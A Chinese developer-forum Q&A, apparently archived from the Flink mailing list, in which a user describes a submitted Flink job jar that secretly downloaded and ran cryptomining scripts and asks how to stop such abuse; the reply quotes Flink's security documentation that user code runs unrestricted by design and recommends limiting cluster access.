开发者社区> 问答> 正文

怎样阻止某些合法用户恶意执行一些非法作业呢?flink框架本身能提供哪些保护手段呢?

今天在公司遇到一件蹊跷的事情,我之前用于session模式提交作业的flink session集群成为某个别有用心的人运行挖矿机的温床。 表面上他提交了一个flink作业jar包,该jar包经过反编译查看到里面执行了一些shell命令从github外网下载诸好C3Pool等一些挖矿脚本运行, 幸好是测试环境,幸好信息安全部门及时扫描发现该漏洞并定位到有问题的作业jar包。 除了将 web.submit.enabled 参数设置成false外,因为有flink sql无法覆盖的场景, 我们并不能阻止用户提交合法streaming api形式的作业,那么要怎样阻止某些合法用户恶意执行一些非法作业呢?flink框架本身能提供哪些保护手段呢?*来自志愿者整理的flink邮件归档

展开
收起
moonlightdisco 2021-12-08 09:44:03 541 0
1 条回答
写回答
取消 提交回答
  • During a security analysis of Flink, I noticed that Flink allows for remote code execution, is this an issue?

    Apache Flink is a framework for executing user-supplied code in clusters. Users can submit code to Flink processes, which will be executed unconditionally, without any attempts to limit what code can run. Starting other processes, establishing network connections or accessing and modifying local files is possible.

    Historically, we’ve received numerous remote code execution vulnerability reports, which we had to reject, as this is by design.

    We strongly discourage users to expose Flink processes to the public internet. Within company networks or “cloud” accounts, we recommend restricting access to a Flink cluster via appropriate means.

    Flink Security文档的说明。这个不是flink框架本身解决的问题,是安全团队和诸如漏扫、威胁检测工具应当完成的工作*来自志愿者整理的flink邮件归档

    2021-12-08 10:07:39
    赞同 展开评论 打赏
问答排行榜
最热
最新

相关电子书

更多
Flink CDC Meetup PPT - 龚中强 立即下载
Flink CDC Meetup PPT - 王赫 立即下载
Flink CDC Meetup PPT - 覃立辉 立即下载